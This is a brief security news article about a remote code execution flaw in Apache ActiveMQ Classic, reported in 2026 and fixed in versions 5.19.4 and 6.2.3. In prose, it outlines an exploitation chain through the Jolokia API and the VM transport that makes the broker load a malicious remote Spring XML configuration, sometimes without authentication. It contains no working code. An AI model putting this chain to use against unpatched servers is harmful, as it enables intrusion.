Critical Apache ActiveMQ Vulnerability Exposed After 13-Year Wait
Apache ActiveMQ Classic Vulnerability
A severe remote code execution (RCE) vulnerability existed in Apache ActiveMQ Classic for approximately 13 years before being discovered in 2026.
Background
The RCE bug was found by exploiting the Jolokia API and forcing the broker to download and execute arbitrary operating system commands. This flaw originated from a bypass of CVE-2022-41678, which permitted attackers to upload web shells to disk by invoking specific Java Development Kit (JDK) Management Beans.
According to the report, “Developers introduced a flag enabling all operations on ActiveMQ Management Beans to be callable through the Jolokia API. However, this fix created a new avenue for exploitation.”
Exploitation
- An attacker could target the VM transport feature in ActiveMQ, allowing them to create brokers within applications. When a VM transport URI references a nonexistent broker, ActiveMQ will create one and accept parameters instructing it to load a configuration, including potentially malicious URLs.
- By chaining these two vulnerabilities, an attacker could persuade the broker to instantiate a Spring XML configuration file, leading to RCE.
- In some cases, this exploit could occur without authentication due to CVE-2024-32114, which allowed Jolokia access to unauthenticated users in ActiveMQ 6.x, making it entirely accessible.
Resolution
The disclosed vulnerability has been fixed in ActiveMQ Classic versions 5.19.4 and 6.2.3. Users are advised to upgrade their installations as soon as possible.
About Author
English